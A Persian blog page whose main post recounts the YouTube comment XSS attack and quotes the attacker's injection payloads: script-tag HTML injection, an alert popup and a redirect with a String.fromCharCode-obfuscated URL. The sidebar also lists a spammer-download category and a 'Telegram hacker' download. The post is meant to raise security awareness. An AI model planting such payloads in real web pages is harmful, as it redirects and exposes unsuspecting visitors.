ایران جستجو
هر چی بخوای اینجا پیدا میشه!ایران جستجو
هر چی بخوای اینجا پیدا میشه!روزانهها
همهپیوندها
- آگهی رایگان نیازمندیهای مهناد -درج آگهی رایگان - تبلیغات رایگان - تبلیغات اینترنتی - خرید و فروش بی واسطه
دستهها
- کامپیوتر 37
- موبایل 65
- قالب وبلاگ 6
- عکس 80
- آهنگ و مداحی 31
- آرایش 9
- آموزش و ترفند 97
- مقالات 55
- اینترنت 11
- مذهبی 21
- ادبی 7
- درسی و کنکوری 9
- معرفی سایت 31
- افزایش آمار و رتبه سایت 4
- کد جاوا اسکریپت 8
- فضای آپلود رایگان 8
- مطالب جالب و خواندنی 40
- اخبار 57
- فیلم و مستند 26
- کتاب 48
- اس ام اس 15
- کلیپ صوتی وتصویری 16
- دانلود اسپمر 1
- آشپزی 4
- دانلود نرم افزار 19
- دکوراسیون 5
- دانلود بازی 9
- ایرانسل و همراه اول 2
- علمی 5
- نرم افزار موبایل 10
- اندروید 7
- آیفون 2
- عاشقانه 6
- دانلود آهنگ 44
- تلگرام 6
- فروشگاه اینترنتی 48
ابر برجسب
دانلود آهنگ عکس طنز اس ام اس 92 اس ام اس جدید دانلود آلبوم جدید اس ام اس متن آهنگ عکس عکس جدید دانلود فول آلبوم دانلود آلبوم خبر اخبار دانلود آهنگ جدید دانلودجدیدترین یادداشتها
همه- تبلیغات
- تبلیغات
- تبلیغات
- تبلیغات
- کسب درآمد با دیدن پاپ آپ
- پست ویژه محرم
- عکس پروفایل برای ماه محرم
- داستان کوتاه پسر بچه درمانده
- دانلود نوحه برای ایستگاه صلواتی و ضبط ماشین ویژه محرم جدید 97
- گلچین مداحی ویژه ضبط ماشین محرم ۹۷
- دانلود نوحه سنگین محرم مخصوص ماشین / مداحی شور 97
- رز بسیار گران قیمتی که تنها در کویر می روید!
- دانلود آهنگ جدید مسعود کرمی و امین پیشرو بنام مست شوم
- دانلود آهنگ جدید شهرام جمالی بنام خوشحالم
- دانلود آهنگ جدید مهدی احمدوند بنام دروغه
- دانلود آهنگ جدید علی لهراسبی بنام طرف تو بودم
- کانال پالامون - جک جدید
- دانلود نسخه جدید هک کننده تلگرام
- دانلود آهنگ جدید حامد همایون به نام حاکم احساس
- دانلود آهنگ جدید پژواک انتظاری دور تکرار+متن آهنگ
- دانلود رایگان تمام قسمت های سریال ساختمان پزشکان با کیفیت عالی
- دانلود آلبوم محمد علیزاده به نام گفتم نرو
- دانلود آهنگ محمد علیزاده به نام عشقم این روزا
- دانلود آهنگ جدید یاس به نام سرکوب همراه با متن آهنگ
- دانلود آهنگ جدید بهزاد پکس به نام تولدت مبارک
- دانلود آهنگ جدید حمید صفت به نام هیهات
- آهنگ جدید علی لهراسبی بنام خوشبختی با کیفیت بالا+ متن آهنگ
- دانلود تمامی آهنگ های محسن چاووشی بصورت تکی و یکجا
- دانلود آهنگ علی زند وکیلی به نام لحظه شیرین
- آموزش کسب درآمد با سایت معتبر ایرانی
بایگانی
- تیر 1399 1
- اردیبهشت 1399 3
- آبان 1397 1
- شهریور 1397 7
- بهمن 1396 5
- دی 1396 1
- اردیبهشت 1396 2
- فروردین 1396 9
- دی 1395 1
- آذر 1395 59
- مرداد 1395 18
- تیر 1395 41
- خرداد 1395 16
- اردیبهشت 1395 10
- فروردین 1395 4
- اسفند 1394 44
- بهمن 1394 29
- دی 1394 2
- مهر 1394 2
- شهریور 1394 15
- مرداد 1394 64
- تیر 1394 31
- خرداد 1394 90
- اردیبهشت 1394 4
- فروردین 1394 13
- اسفند 1393 18
- دی 1393 1
- آذر 1393 118
- آبان 1393 36
- مهر 1393 1
- شهریور 1393 2
- مرداد 1393 2
- تیر 1393 3
- فروردین 1393 9
- بهمن 1392 10
- دی 1392 6
- آذر 1392 12
- آبان 1392 18
- مهر 1392 2
- شهریور 1392 14
- اردیبهشت 1392 23
- فروردین 1392 45
- بهمن 1391 4
- دی 1391 5
- آذر 1391 3
- آبان 1391 45
- مهر 1391 2
- شهریور 1391 27
- مرداد 1391 48
- تیر 1391 59
- خرداد 1391 7
- فروردین 1391 7
- اسفند 1390 1
- بهمن 1390 6
- دی 1390 20
- آذر 1390 128
- مهر 1389 1
- شهریور 1389 2
- مرداد 1389 8
- تیر 1389 6
- دی 1388 2
- آذر 1388 1
- آبان 1388 1
- مهر 1388 1
- شهریور 1388 15
- مرداد 1388 205
تقویم
تیر 1399| ش | ی | د | س | چ | پ | ج |
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
جستجو
چگونه یوتیوب هک شد؟(همراه با کد)
حتما اخبار هک شدن یوتیوب را دو روز پیش شنیدید. در اینجا قصد داریم به آناتومی هک شدن بزرگترین سایت حاوی فایلهای مولتی مدیا بپردازیم تا با اطلاعا از نوع حملات به امنیت اطلاعات بیشتر بها دهیم.
اخبار از این قرار است که کاربران عضو فوروم 4chan با دستکاری سیستم کامنت گذاری یوتیوب کاربرانی که قصد دیدن صفحات مختلف را داشتند منحرف کرده و صفحات دیگری روی سایت نمایان می شد. (آنها این کار را علیه خواننده ای بنام جاستین که صفحاتش روی یوتیوب بود، انجام دادند.) در واقع مکانیسم امنیتی بکار رفته در صفحات وب از این طریق دور زده می شود و حمله کننده با دسترسی کامل می تواند اطلاعات حساس کاربر قربانی دسترسی پیدا کند. این کار از طریق تزریق کد مخرب عملیاتی می شود. سایر کاربران از این روش استفاده کرده و کاربرانی که قصد دیدن ویدئو ها را داشتند به صفحات انحرافی می کشاندند. بیش از 2 ساعت سیستم کامنت گذاری یوتیوب قطع شده و کارشناسان آنرا از حالت دیفالت در آورده و مجددا تنظیم نمودند.
اما حمله از راه XSS بوده است. حفره ای است روی صفحه وب که با تزریق اسکریپتی سایر کاربران می توانند آنرا ببینند. حمله کننده کنترل دسترسی به صفحه خاص را از آن خود می کند. اولین گزارش از این نوع حفره در دهه 1990 گزارش شد. 80 درصد از نوع حملات ثبت شده در شرکت امنیتی سیمانتک در سال 2007 از این نوع بوده است.
تگی به صورت اسکریپت در ابتدای کامنت توسط هکر گذاشته شده و محتویات مخرب چاپ شده و هر کسی روی آن کلیک کند به طور نا خواسته به دستور یا کامند مورد علاقه هکر جواب داده و مثلا صفحه ای انحرافی با شده و یا پاپ آپ غیر ضروری مورد علاقه هکر روی صفحه اش باز می شد.
نمونه ای از اسکریپت مورد نظر را می توانید در زیر ببینید:
How you can activate HTML in comments? It's very simple. With:
<script>HTML Code
Example:
<script><h1> Visit Insecurity.Ro - ISR Security Team <blink><marquee><br><br>TinKode
And for popup:
<script><BODY onLoad="alert('Visit Insecurity.ro - TinKode');"
If you want to make redirect:
<script>Zbody onLoad="document.write('<script>window.location = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 110, 115, 101, 99, 117, 114, 105, 116, 121, 46, 114, 111, 47);</script>');";
If you add this comment the page will be auto redirected to www.insecurity.ro
منبع: وبلاگ علیرضا خراسانی
